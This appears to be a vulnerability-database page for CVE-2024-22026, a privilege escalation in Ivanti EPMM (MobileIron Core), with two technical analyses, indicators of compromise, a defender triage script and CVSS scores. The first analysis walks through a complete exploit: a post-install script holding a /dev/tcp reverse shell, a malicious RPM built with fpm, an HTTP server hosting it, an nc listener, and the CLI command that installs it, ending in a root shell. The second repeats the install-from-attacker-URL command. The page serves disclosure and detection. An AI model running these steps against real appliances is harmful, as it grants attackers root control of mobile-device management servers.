Attacker Value: Low (2 users assessed)
Exploitability: High (2 users assessed)
User Interaction: None
Privileges Required: High
Attack Vector: Local

CVE-2024-22026

Disclosure Date: May 22, 2024

Description

A local privilege escalation vulnerability in EPMM before 12.1.0.0 allows an authenticated local user to bypass shell restriction and execute arbitrary commands on the appliance.

2
Ratings
Technical Analysis

Ivanti EPMM (previously known as MobileIron Core) is vulnerable to a local privilege escalation vulnerability. The install command accessible from the MobileIron CORE CLI or Ivanti EPMM CLI allows privileged CLI users to install .rpm packages. Affected versions are versions prior to 12.1.0.0, 12.0.0.0, and 11.12.0.1.

The install command fails to enforce signature verification or URL filtering of any sort when installing an rpm from a url, allowing an attacker to host a malicious rpm package and have their victim download and install it with root privileges.

There exists an install binary on the affected appliance; please note that it is unrelated to the install command accessible from the CLI, which is the one vulnerable to the priv esc:

which install
/bin/install
install --help
Usage: install [OPTION]... [-T] SOURCE DEST
  or:  install [OPTION]... SOURCE... DIRECTORY
  or:  install [OPTION]... -t DIRECTORY SOURCE...
  or:  install [OPTION]... -d DIRECTORY...

This install program copies files (often just compiled) into destination
locations you choose.  If you want to download and install a ready-to-use
package on a GNU/Linux system, you should instead be using a package manager
like yum(1) or apt-get(1).

To access the vulnerable command, one must first gain CLI access via SSH or physical access.

➜ ssh msfuser@172.16.199.40
msfuser@172.16.199.40's password:
Last login: Mon Jun  3 14:12:12 2024 from 172.16.199.1
************************************************************
*                   MobileIron CORE CLI                    *
*                                                          *
*                                                          *
************************************************************
Welcome msfuser it is Mon Jun 3 15:00:14 UTC 2024
CORE(11.2.0.0-31)@lobster.example.com>

  enable      Turn on privileged commands
  exit        Exit from the EXEC
  help        Description of the interactive help system
  host        Query Internet name servers
  logout      Exit from the EXEC
  ping        Send echo messages
  show        Show running system information
  speedtest   Performs speed test for disk memory and cpu
  timeout     CLI Idle timeout.
  traceroute  Trace route to destination

Then turn on privileged commands with enable followed by the correct Admin CLI password:

CORE(11.2.0.0-31)@lobster.example.com> enable
Password:
CORE(11.2.0.0-31)@lobster.example.com#install

  rpm  Gets the rpm and install. choose any from: cdrom file info url

CORE(11.2.0.0-31)@lobster.example.com#install rpm

  cdrom  Gets the rpm and install from cdrom
  file   Get and show the rpm(s) from the given file path and installs
  info   Gets list of rpms installed
  url    Gets the rpm and install from the given url

As outlined by securekomodo in the following blog post, the CLI command install is really just a wrapper for the command:

/bin/rpm -Uvh *.rpm

This will be run as root, allowing an attacker to host a malicious RPM package, install it, and successfully escalate privileges.

Example PoC

Create a postinstall.sh script that will run as root after the .rpm package gets installed. Include your payload.

msfuser@msfuser-virtual-machine:~/CVE-2024-22026$ cat postinstall.sh
#!/bin/sh
bash -i >& /dev/tcp/172.16.199.131/443 0>&1
exit 0

Create the malicious .rpm package using the Ruby gem fpm:

msfuser@msfuser-virtual-machine:~/CVE-2024-22026$ fpm -s dir -t rpm -n test-poc -v 2.0 -a i386 --description "MobileIron Reverse Shell" --maintainer "msfuser" --after-install postinstall.sh -C .
Created package {:path=>"test-poc-2.0-1.i386.rpm"}

Host the .rpm package via a Python HTTP server:

msfuser@msfuser-virtual-machine:~/CVE-2024-22026$ sudo python3 -m http.server 80
[sudo] password for msfuser:
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Start a nc listener on our attacking machine:

msfuser@msfuser-virtual-machine:~/CVE-2024-22026$ sudo nc -l 443
[sudo] password for msfuser:

As previously demonstrated, SSH to the vulnerable appliance or physically access the MobileIron Core / Ivanti EPMM CLI and type enable followed by the Admin password in order to enable privileged commands. Once successfully authenticated, use the vulnerable command to download and install the .rpm in the context of the root user.

CORE(11.2.0.0-31)@lobster.example.com#install rpm url http://172.16.199.131/test-poc-2.0-1.i386.rpm
--2024-06-03 16:04:48--  http://172.16.199.131/test-poc-2.0-1.i386.rpm
Connecting to 172.16.199.131:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 49796 (49K) [application/x-redhat-package-manager]
Saving to: 'test-poc-2.0-1.i386.rpm'

100%[====================================================================================================================================================================================================================>] 49,796      --.-K/s   in 0.001s

2024-06-03 16:04:48 (32.7 MB/s) - 'test-poc-2.0-1.i386.rpm' saved [49796/49796]

Preparing...                          ################################# [100%]
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   469  100   469    0     0   279k      0 --:--:-- --:--:-- --:--:--  458k
Updating / installing...
   1:test-poc-2.0-1                   ################################# [100%]

Check the nc listener and see that we’ve received a shell running in the context of the root user.

msfuser@msfuser-virtual-machine:~/CVE-2024-22026$ sudo nc -l 443
[sudo] password for msfuser:
[root@lobster.example.com 2024-06-03--16-30-57 / #] id
id
uid=0(root) gid=0(root) groups=0(root)
[root@lobster.example.com 2024-06-03--16-42-52 / #] uname -a
uname -a
Linux lobster.example.com 3.10.0-1160.6.1.el7.x86_64 #1 SMP Tue Nov 17 13:59:11 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

To reset the target in order to retest, simply remove the package you just installed with:

CORE(11.2.0.0-31)@lobster.example.com#no install rpm test-poc-2.0-1.i386
Uninstalled  ivanti-privesc-13.37-1.i386 successfully.

IoCs

Unprivileged users can query logs from the MobileIron / Ivanti EPMM CLI. One way users can check for IoCs is by issuing the following command:

CORE(11.2.0.0-31)@lobster.example.com> show log messages
--log 'messages' --

The above command will allow the user to access /var/log/messages via the CLI. The below isn't indicative of a successful exploit attempt; the following log lines will be present on a device where the user has installed malicious or trusted RPM packages using the CLI.

Jun  3 16:51:51 lobster installTools: Command: /bin/rpm -Uvh *.rpm successful
Jun  3 16:51:51 lobster installTools: Command: /bin/ls *.rpm  >> /mi/files/installedTools successful
Jun  3 16:51:52 lobster installTools: Command: /bin/rm * >& /dev/null successful
Jun  3 16:51:52 lobster installTools: Command: popd >& /dev/null successful
Jun  3 16:51:52 lobster installTools: RPM downloaded and installed successfully

Interestingly enough, it doesn't seem this command completes successfully, despite it saying that it does. There is no reference to our malicious .rpm file in the file /mi/files/installedTools:

Jun  3 16:51:51 lobster installTools: Command: /bin/ls *.rpm  >> /mi/files/installedTools successful

It gets created but is zero bytes:

[root@lobster.example.com 2024-06-03--17-31-48 files #] ls -l /mi/files/installedTools
ls -l /mi/files/installedTools
-rw-r--r-- 1 root root 0 Jun  3 17:27 /mi/files/installedTools

Also, one can look at the current processes for telltale signs of successful exploitation by running:

[root@lobster.example.com 2024-06-03--17-35-43 files #] ps aux
ps aux
USER        PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
...
root      63342  0.0  0.0 137500  5536 pts/0    S    17:27   0:00 /usr/bin/sudo /mi/bin/installTools url http://172.16.199.131/test-poc-2.0-1.i386.rpm
root      63345  0.0  0.0   9700  1584 pts/0    S    17:27   0:00 /bin/bash /mi/bin/installTools url http://172.16.199.131/test-poc-2.0-1.i386.rpm
root      63407  0.0  0.1  78976 10308 pts/0    S    17:27   0:00 /bin/rpm -Uvh test-poc-2.0-1.i386.rpm
root      63408  0.0  0.0   9564  1124 pts/0    S    17:27   0:00 /bin/sh /var/tmp/rpm-tmp.D6MXUG 1
root      63409  0.0  0.0 116004  2684 pts/0    S    17:27   0:00 bash -i

We can see that the processes that were spawned in order to download and install our malicious rpm are still running.
If we get the PID from the reverse shell, we can confirm that 63409 in the above is our reverse shell and the sink of our exploit.

[root@lobster.example.com 2024-06-03--17-37-12 files #] echo "My PID is $$"
echo "My PID is $$"
My PID is 63409

If we run the following, we can get a bit more detail about the context of the root process spawned when this is exploited:

[root@lobster.example.com 2024-06-03--17-58-29 var #] ps auxe | grep 63409
ps auxe | grep 63409
root      63409  0.0  0.0 116004  2704 pts/0    S    17:27   0:00 bash -i XDG_SESSION_ID=2903 MI_DATE_FORMAT=%Y-%m-%d--%H-%M-%S TERM=xterm-256color SHELL=/bin/bash MI_DATE_COMMAND=date +%Y-%m-%d--%H-%M-%S USER=root SUDO_USER=msfuser SUDO_UID=2002 USERNAME=root RPM_INSTALL_PREFIX0=/ MAIL=/var/mail/root PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/X11R6/bin _=/bin/bash PWD=/ JAVA_HOME=/usr/java/default HOME=/root SUDO_COMMAND=/mi/bin/installTools url http://172.16.199.131/test-poc-2.0-1.i386.rpm SHLVL=2 RPM_INSTALL_PREFIX=/ LOGNAME=root SUDO_GID=1001

Attacker Value and Exploitability Rating

I gave this vulnerability an attacker rating of 1/5, mainly due to the fact that authentication to the CLI is required, as well as the CLI Admin password, in order to enable privileged commands and access the vulnerable command install.

Once the necessary credentials are obtained, exploitation is straightforward: host the malicious package for the victim to download and install, then profit. However, the need for such high credentials makes this vulnerability difficult to exploit in the real world.
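Added example, not part of the assessment above nor Ivanti's tooling: a small Python triage script that applies the IoCs described in that assessment to `/var/log/messages` lines (the `installTools` entries) and to `ps aux` output (an `installTools url` fetch, a still-running `/var/tmp/rpm-tmp.*` scriptlet, an interactive root shell). `TRUSTED_HOSTS` and the sample log and process lines are constructed assumptions.

```python
"""Defender-side triage for the CVE-2024-22026 IoCs: CLI RPM installs recorded
in /var/log/messages and lingering rpm scriptlet processes in `ps aux` output.
Added example; TRUSTED_HOSTS and the sample data below are constructed."""
import re
from urllib.parse import urlsplit

# Constructed assumption: the only hosts this organisation fetches RPMs from.
TRUSTED_HOSTS = {"updates.example.com"}

LOG_RE = re.compile(r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) (?P<host>\S+) installTools: (?P<msg>.*)$")
# `ps aux`: USER, PID, then eight fixed columns, then the command line.
PS_RE = re.compile(r"^(?P<user>\S+)\s+(?P<pid>\d+)\s+(?:\S+\s+){8}(?P<cmd>.*)$")
URL_RE = re.compile(r"/mi/bin/installTools url (?P<url>\S+)")
SCRIPTLET_RE = re.compile(r"^/bin/sh /var/tmp/rpm-tmp\.\w+ \d+$")

def cli_rpm_installs(log_lines):
    """Timestamps of 'RPM downloaded and installed' events. On its own this only
    shows that *some* RPM went through the CLI, malicious or trusted."""
    return [m["ts"] for m in map(LOG_RE.match, log_lines)
            if m and m["msg"] == "RPM downloaded and installed successfully"]

def suspicious_processes(ps_lines):
    """Flag installTools fetches from unexpected hosts, post-install scriptlets
    that are still running, and interactive root shells."""
    findings = []
    for m in filter(None, map(PS_RE.match, ps_lines)):
        cmd, pid = m["cmd"], m["pid"]
        url = URL_RE.search(cmd)
        if url and urlsplit(url["url"]).hostname not in TRUSTED_HOSTS:
            findings.append(f"pid {pid}: RPM fetched from {urlsplit(url['url']).hostname}")
        elif SCRIPTLET_RE.match(cmd):  # a scriptlet should exit within seconds
            findings.append(f"pid {pid}: rpm scriptlet still running: {cmd}")
        elif m["user"] == "root" and cmd == "bash -i":
            findings.append(f"pid {pid}: interactive root shell")
    return findings

# Constructed samples mirroring the formats shown in the write-up.
SAMPLE_LOG = [
    "Jun  3 16:51:51 lobster installTools: Command: /bin/rpm -Uvh *.rpm successful",
    "Jun  3 16:51:52 lobster installTools: RPM downloaded and installed successfully",
    "Jun  3 16:52:10 lobster sshd[1234]: Accepted password for msfuser from 172.16.199.1",
]
SAMPLE_PS = [
    "USER        PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND",
    "root      63345  0.0  0.0   9700  1584 pts/0    S    17:27   0:00 /bin/bash /mi/bin/installTools url http://192.0.2.10/pkg.rpm",
    "root      63407  0.0  0.1  78976 10308 pts/0    S    17:27   0:00 /bin/rpm -Uvh pkg.rpm",
    "root      63408  0.0  0.0   9564  1124 pts/0    S    17:27   0:00 /bin/sh /var/tmp/rpm-tmp.ABCDEF 1",
    "root      63409  0.0  0.0 116004  2684 pts/0    S    17:27   0:00 bash -i",
]

if __name__ == "__main__":
    print(cli_rpm_installs(SAMPLE_LOG))
    print("\n".join(suspicious_processes(SAMPLE_PS)))
```

On a real appliance, feed it the output of `show log messages` and `ps aux` captured from the CLI; a CLI install event with no matching change request is the thing to chase.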

1
Ratings
Technical Analysis

CVE-2024-22026 is a local privilege escalation vulnerability in Ivanti EPMM (formerly MobileIron) server versions prior to 12.1.0.0, 12.0.0.0, and 11.12.0.1. This vulnerability allows a local attacker to gain root access to the system by exploiting the software update process with a malicious RPM package from a remote URL.

The appliance uses the following command to fetch and install RPM packages as a low-privilege user. This, of course, means you must have CLI access:

install rpm url <remote url>

The above command is only a CLI wrapper for the following, which runs as root:

/bin/rpm -Uvh *.rpm

This underlying rpm command does not enforce any signature verification or URL filtering, meaning any RPM package can be installed. This allows an attacker to forge and deliver a malicious RPM package that can compromise the appliance.

So you can root the appliance by hosting a malicious RPM with whatever commands you want, then fetch it using the standard update command on the Ivanti EPMM CLI, and your commands will run as root.

install rpm url http://<attacker_IP>/malicious.rpm

I have provided a POC here:
https://www.redlinecybersecurity.com/blog/exploiting-cve-2024-22026-rooting-ivanti-epmm-mobileiron-core

CVSS V3 Severity and Metrics
Base Score: 6.7 Medium
Impact Score: 5.9
Exploitability Score: 0.8
Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Attack Vector (AV): Local
Attack Complexity (AC): Low
Privileges Required (PR): High
User Interaction (UI): None
Scope (S): Unchanged
Confidentiality (C): High
Integrity (I): High
Availability (A): High

General Information

Vendors

  • ivanti

Products

  • endpoint manager mobile
